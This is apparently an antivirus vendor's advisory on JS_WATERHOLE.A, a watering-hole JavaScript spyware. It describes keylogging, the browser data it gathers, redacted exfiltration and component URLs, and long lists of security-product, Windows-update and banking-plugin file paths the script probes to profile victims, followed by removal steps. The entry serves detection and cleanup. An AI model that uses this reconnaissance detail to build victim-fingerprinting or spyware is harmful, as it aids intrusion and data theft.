JS_WATERHOLE.A


 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Spyware

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Infection Channel:

Downloaded from the Internet

This spyware executes when a user accesses certain websites where it is hosted.

It logs a user's keystrokes to steal information.

  TECHNICAL DETAILS

File Size:

Varies

File Type:

Script

Initial Samples Received Date:

14 Nov 2014

Payload:

Steals information

Arrival Details

This spyware executes when a user accesses certain websites where it is hosted.

This malware arrives via the following means:

  • loaded by the URL, http://{BLOCKED}o.usa.cc/tance_script/i/?1
  • accessing compromised websites

Information Theft

This spyware gathers the following data:

  • IP address
  • Referer
  • User-Agent
  • Location
  • Cookie
  • Webpage title
  • Domain
  • character encoding
  • Screen height and width
  • System Platform
  • Default Language

It logs a user's keystrokes to steal information.

Stolen Information

This spyware sends the gathered information via HTTP POST to the following URL:

  • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/recv.php
  • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/s.php
  • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/p.php
  • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/k.php

Other Details

This spyware does the following:

  • It accesses the following URLs to load other component scripts (also detected as JS_WATERHOLE.A) which are used for information gathering:
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?2
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?3
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?4
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?5
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?7
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?9
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?10
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?12
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?13
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?14
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?15
  • It reports installed applications in the system by checking if any of the following files are present:
    • avira - c:/WINDOWS/system32/drivers/avipbb.sys
    • bitdefender_2013 - c:/Program Files/Bitdefender/Bitdefender 2013 BETA/BdProvider.dll
    • bitdefender_2013 - c:/Program Files/Bitdefender/Bitdefender 2013 BETA/Active Virus Control/avc3_000_001/avcuf32.dll
    • mcafee_enterprise - c:/Program Files/McAfee/VirusScan Enterprise/RES0402/McShield.dll
    • mcafee_enterprise - c:/Program Files/Common Files/McAfee/SystemCore/mytilus3.dll
    • mcafee_enterprise - c:/Program Files/Common Files/McAfee/SystemCore/mytilus3_worker.dll
    • avg2012 - c:/Program Files/AVG Secure Search/13.2.0.4/AVG Secure Search_toolbar.dll
    • avg2012 - c:/Program Files/Common Files/AVG Secure Search/DNTInstaller/13.2.0/avgdttbx.dll
    • avg2012 - c:/WINDOWS/system32/drivers/avgtpx86.sys
    • eset_nod32 - c:/WINDOWS/system32/drivers/eamon.sys
    • Dr.Web - c:/Program Files/DrWeb/drwebsp.dll
    • Mse - c:/WINDOWS/system32/drivers/MpFilter.sys
    • sophos - c:/PROGRA~1/Sophos/SOPHOS~1/SOPHOS~1.DLL
    • f-secure2011 - c:/program files/f-secure/scanner-interface/fsgkiapi.dll
    • f-secure2011 - c:/Program Files/F-Secure/FSPS/program/FSLSP.DLL
    • f-secure2011 - c:/program files/f-secure/hips/fshook32.dll
    • Kaspersky_2012 - c:/Program Files/Kaspersky Lab/Kaspersky Anti-Virus 2012/klwtblc.dll
    • Kaspersky_2012 - c:/WINDOWS/system32/drivers/klif.sys
    • Kaspersky_2013 - c:/Program Files/Kaspersky Lab/Kaspersky Anti-Virus 2013/remote_eka_prague_loader.dll
    • Kaspersky_2013 - c:/Program Files/Kaspersky Lab/Kaspersky Anti-Virus 2013/klwtblc.dll
    • Kaspersky_2013 - c:/WINDOWS/system32/drivers/kneps.sys
    • Kaspersky_2013 - c:/WINDOWS/system32/drivers/klflt.sys
    • WinRAR - c:/Program Files/WinRAR/WinRAR.exe
    • iTunes - c:/Program Files (x86)/iTunes/iTunesHelper.exe
    • iTunes - c:/Program Files/iTunes/iTunesHelper.exe
    • SQLServer - c:/Program Files (x86)/Microsoft SQL Server/80/COM/sqlvdi.dll
    • SQLServer - c:/Program Files/Microsoft SQL Server/80/COM/sqlvdi.dll
    • SQLServer - c:/Program Files (x86)/Microsoft SQL Server/90/COM/instapi.dll
    • SQLServer - c:/Program Files/Microsoft SQL Server/90/COM/instapi.dll
    • winzip - c:/Program Files/WinZip/WZSHLSTB.DLL
    • winzip - c:/Program Files/WinZip/ZipSendB.dll
    • 7z - c:/Program Files (x86)/7-Zip/7z.exe
    • 7z - c:/Program Files/7-Zip/7z.exe
    • vmware-server - c:/WINDOWS/system32/drivers/vmx86.sys
    • vmware-server - c:/WINDOWS/system32/drivers/vmnet.sys
    • vmware-client - c:/WINDOWS/system32/drivers/vmxnet.sys
    • symantec-endpoint - c:/WINDOWS/system32/drivers/WpsHelper.sys
    • symantec-endpoint - c:/WINDOWS/system32/drivers/SYMEVENT.SYS
    • symantec-endpoint - c:/Program Files/Symantec/Symantec Endpoint Protection/wpsman.dll
    • F-Secure - C:/Program Files/F-Secure/ExploitShield/fsesgui.exe
    • antiyfx - C:/Program Files/agb7pro/agb.exe
    • ESTsoft - C:/Program Files/ESTsoft/ALYac/AYLaunch.exe
    • ESTsoft - C:/WINDOWS/system32/drivers/EstRtw.sys
    • Fortinet - C:/Program Files/Fortinet/FortiClient/FortiClient.exe
    • Fortinet - C:/WINDOWS/system32/drivers/FortiRdr.sys
    • ViRobot4 - C:/Program Files/ViRobotXP/Vrmonnt.exe
    • VirusBuster - C:/Program Files/VirusBuster/winpers.exe
    • VirusBuster - C:/WINDOWS/system32/drivers/vbengnt.sys
    • COMODO - C:/WINDOWS/system32/drivers/cmderd.sys
    • a-squared - C:/Program Files/a-squared Anti-Malware/a2cmd.exe
    • IKARUS - C:/Program Files/IKARUS/anti.virus/unGuardX.exe
    • sophos - C:/WINDOWS/system32/drivers/SophosBootDriver.sys
    • sophos - C:/Program Files/Sophos/Sophos Anti-Virus/SavMain.exe
    • Nprotect - C:/Program Files/INCAInternet/nProtect Anti-Virus Spyware 3.0/nsphsvr.exe
    • Trend2013 - C:/Program Files/Trend Micro/Titanium/UIFramework/uiWinMgr.exe
    • Trend2013 - C:/WINDOWS/system32/drivers/tmtdi.sys
    • Norton - C:/Program Files/Norton Internet Security/Branding/muis.dll
    • Norton - C:/WINDOWS/system32/drivers/SYMEVENT.SYS
    • Outpost - C:/Program Files/Agnitum/Outpost Security Suite Pro/acs.exe
    • Outpost - C:/WINDOWS/system32/drivers/afwcore.sys
    • AhnLab_V3 - C:/Program Files/AhnLab/V3IS80/V3Main.exe
    • F-PROT - C:/Program Files/FRISK Software/F-PROT Antivirus for Windows/FPWin.exe
    • F-PROT - C:/WINDOWS/system32/drivers/FStopW.sys
    • ESET-SMART - C:/Program Files/ESET/ESET Smart Security/egui.exe
    • ESET-SMART - C:/WINDOWS/system32/drivers/eamon.sys
    • Kaspersky_Endpoint_Security_8 - C:/Program Files/Kaspersky Lab/Kaspersky Endpoint Security 8 for Windows/avp.exe
    • Norman - C:/Program Files/Norman/Nse/Bin/nse.exe
    • Norman - C:/WINDOWS/system32/drivers/nvcw32mf.sys
    • Sunbelt - C:/Program Files/Sunbelt Software/Personal Firewall/cfgconv.exe
    • QuickHeal - C:/Program Files/Quick Heal/Quick Heal Total Security/ARKIT.EXE
    • QuickHeal - C:/WINDOWS/system32/drivers/catflt.sys
    • Immunet - C:/Program Files/Immunet/ips.exe
    • Immunet - C:/WINDOWS/system32/drivers/ImmunetProtect.sys
    • JiangMin - C:/Program Files/JiangMin/AntiVirus/KVPopup.exe
    • JiangMin - C:/WINDOWS/system32/drivers/SysGuard.sys
    • PC_Tools - C:/Program Files/PC Tools Antivirus Software/pctsGui.exe
    • Rising_firewall - C:/Program Files/Rising/RFW/RavMonD.exe
    • Rising_firewall - C:/WINDOWS/system32/drivers/protreg.sys
    • BkavHome - C:/Program Files/BkavHome/Bka.exe
    • BkavHome - C:/WINDOWS/system32/drivers/BkavAuto.sys
    • SUPERAntiSpyware - C:/Program Files/SUPERAntiSpyware/SUPERAntiSpyware.exe
    • Rising - C:/Program Files/Rising/RIS/LangSel.exe
    • Rising - C:/WINDOWS/system32/drivers/HookHelp.sys
    • Symantec_Endpoint12 - C:/Program Files/Symantec/Symantec Endpoint Protection/DoScan.exe
    • eScan - C:/Program Files/eScan/shortcut.exe
    • eScan - C:/WINDOWS/system32/drivers/econceal.sys
    • Bit9 - C:/Windows/System32/drivers/Parity.sys
    • emet4.1 - C:/Program Files (x86)/EMET 4.1/EMET.dll
    • emet4.1 - C:/Program Files/EMET 4.1/EMET.dll
    • emet4.1 - d:/Program Files/EMET 4.1/EMET.dll
    • emet4.1 - D:/Program Files (x86)/EMET 4.1/EMET.dll
    • emet5.0 - C:/Program Files (x86)/EMET 5.0/EMET.dll
    • emet5.0 - C:/Program Files/EMET 5.0/EMET.dll
    • emet5.0 - d:/Program Files (x86)/EMET 5.0/EMET.dll
    • emet5.0 - d:/Program Files/EMET 5.0/EMET.dll
    • 360 - C:/Program Files/360/360Safe/360Safe.exe
    • 360 - d:/Program Files/360/360Safe/360Safe.exe
  • It also reports all Windows Updates installed in the system by checking if any of the following files are present:
    • KB2378111 - c:/WINDOWS/KB2378111.log
    • KB954155 - c:/WINDOWS/KB954155.log
    • KB972187 - c:/WINDOWS/KB972187.log
    • KB975558 - c:/WINDOWS/KB975558.log
    • KB978695 - c:/WINDOWS/KB978695.log
    • KB2564958 - c:/WINDOWS/KB2564958.log
    • KB915865 - c:/WINDOWS/KB915865.log
    • KB2115168 - c:/WINDOWS/KB2115168.log
    • KB2229593 - c:/WINDOWS/KB2229593.log
    • KB2296011 - c:/WINDOWS/KB2296011.log
    • KB2345886 - c:/WINDOWS/KB2345886.log
    • KB2347290 - c:/WINDOWS/KB2347290.log
    • KB2360937 - c:/WINDOWS/KB2360937.log
    • KB2387149 - c:/WINDOWS/KB2387149.log
    • KB2419632 - c:/WINDOWS/KB2419632.log
    • KB2423089 - c:/WINDOWS/KB2423089.log
    • KB2440591 - c:/WINDOWS/KB2440591.log
    • KB2443105 - c:/WINDOWS/KB2443105.log
    • KB2476490 - c:/WINDOWS/KB2476490.log
    • KB2478960 - c:/WINDOWS/KB2478960.log
    • KB2478971 - c:/WINDOWS/KB2478971.log
    • KB2479943 - c:/WINDOWS/KB2479943.log
    • KB2481109 - c:/WINDOWS/KB2481109.log
    • KB2483185 - c:/WINDOWS/KB2483185.log
    • KB2485663 - c:/WINDOWS/KB2485663.log
    • KB2506212 - c:/WINDOWS/KB2506212.log
    • KB2507938 - c:/WINDOWS/KB2507938.log
    • KB2508429 - c:/WINDOWS/KB2508429.log
    • KB2509553 - c:/WINDOWS/KB2509553.log
    • KB2510581 - c:/WINDOWS/KB2510581.log
    • KB2535512 - c:/WINDOWS/KB2535512.log
    • KB2536276-v2 - c:/WINDOWS/KB2536276-v2.log
    • KB2544521 - c:/WINDOWS/KB2544521.log
    • KB2544893-v2 - c:/WINDOWS/KB2544893-v2.log
    • KB2566454 - c:/WINDOWS/KB2566454.log
    • KB2570947 - c:/WINDOWS/KB2570947.log
    • KB2584146 - c:/WINDOWS/KB2584146.log
    • KB2585542 - c:/WINDOWS/KB2585542.log
    • KB2592799 - c:/WINDOWS/KB2592799.log
    • KB2598479 - c:/WINDOWS/KB2598479.log
    • KB2603381 - c:/WINDOWS/KB2603381.log
    • KB2619339 - c:/WINDOWS/KB2619339.log
    • KB2620712 - c:/WINDOWS/KB2620712.log
    • KB2624667 - c:/WINDOWS/KB2624667.log
    • KB2631813 - c:/WINDOWS/KB2631813.log
    • KB2641690 - c:/WINDOWS/KB2641690.log
    • KB2646524 - c:/WINDOWS/KB2646524.log
    • KB2653956 - c:/WINDOWS/KB2653956.log
    • KB2655992 - c:/WINDOWS/KB2655992.log
    • KB2659262 - c:/WINDOWS/KB2659262.log
    • KB2660649 - c:/WINDOWS/KB2660649.log
    • KB2661637 - c:/WINDOWS/KB2661637.log
    • KB2676562 - c:/WINDOWS/KB2676562.log
    • KB2691442 - c:/WINDOWS/KB2691442.log
    • KB2698365 - c:/WINDOWS/KB2698365.log
    • KB2705219-v2 - c:/WINDOWS/KB2705219-v2.log
    • KB2712808 - c:/WINDOWS/KB2712808.log
    • KB2718704 - c:/WINDOWS/KB2718704.log
    • KB2719985 - c:/WINDOWS/KB2719985.log
    • KB2723135-v2 - c:/WINDOWS/KB2723135-v2.log
    • KB2724197 - c:/WINDOWS/KB2724197.log
    • KB2727528 - c:/WINDOWS/KB2727528.log
    • KB2736233 - c:/WINDOWS/KB2736233.log
    • KB2753842-v2 - c:/WINDOWS/KB2753842-v2.log
    • KB2757638 - c:/WINDOWS/KB2757638.log
    • KB2758857 - c:/WINDOWS/KB2758857.log
    • KB2761465 - c:/WINDOWS/KB2761465.log
    • KB2770660 - c:/WINDOWS/KB2770660.log
    • KB2779030 - c:/WINDOWS/KB2779030.log
    • KB923561 - c:/WINDOWS/KB923561.log
    • KB932716-v2 - c:/WINDOWS/KB932716-v2.log
    • KB943232-v2 - c:/WINDOWS/KB943232-v2.log
    • KB946648 - c:/WINDOWS/KB946648.log
    • KB950762 - c:/WINDOWS/KB950762.log
    • KB950974 - c:/WINDOWS/KB950974.log
    • KB951748 - c:/WINDOWS/KB951748.log
    • KB951830 - c:/WINDOWS/KB951830.log
    • KB951978 - c:/WINDOWS/KB951978.log
    • KB952004 - c:/WINDOWS/KB952004.log
    • KB952287 - c:/WINDOWS/KB952287.log
    • KB952954 - c:/WINDOWS/KB952954.log
    • KB953155 - c:/WINDOWS/KB953155.log
    • KB955535 - c:/WINDOWS/KB955535.log
    • KB956802 - c:/WINDOWS/KB956802.log
    • KB956844 - c:/WINDOWS/KB956844.log
    • KB958752 - c:/WINDOWS/KB958752.log
    • KB959426 - c:/WINDOWS/KB959426.log
    • KB960803 - c:/WINDOWS/KB960803.log
    • KB960859 - c:/WINDOWS/KB960859.log
    • KB967715 - c:/WINDOWS/KB967715.log
    • KB968389 - c:/WINDOWS/KB968389.log
    • KB969059 - c:/WINDOWS/KB969059.log
    • KB971029 - c:/WINDOWS/KB971029.log
    • KB971657 - c:/WINDOWS/KB971657.log
    • KB972270 - c:/WINDOWS/KB972270.log
    • KB973507 - c:/WINDOWS/KB973507.log
    • KB97381 - c:/WINDOWS/KB97381.log
  • It reports installed versions of the following applications:
    • Flash
    • MS Office
    • PDF
    • Java
  • It reports if any of the following files are present:
    • icbc - C:/Windows/SysWOW64/SubmitControl.dll
    • icbc - C:/Windows/system32/SubmitControl.dll
    • icbc - D:/Windows/SysWOW64/SubmitControl.dll
    • icbc - D:/Windows/system32/SubmitControl.dll
    • cmb - C:/Windows/system32/CMBEdit.dll
    • cmb - C:/Windows/SysWOW64/CMBEdit.dll
    • cmb - D:/Windows/system32/CMBEdit.dll
    • cmb - D:/Windows/SysWOW64/CMBEdit.dll

  SOLUTION

Minimum Scan Engine:

9.700

FIRST VSAPI PATTERN FILE:

11.276.04

FIRST VSAPI PATTERN DATE:

14 Nov 2014

VSAPI OPR PATTERN File:

11.277.00

VSAPI OPR PATTERN Date:

15 Nov 2014

Step 1

Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.

Step 2

Close all opened browser windows

Step 3

Scan your computer with your Trend Micro product to delete files detected as JS_WATERHOLE.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.


Did this description help? Tell us how we did.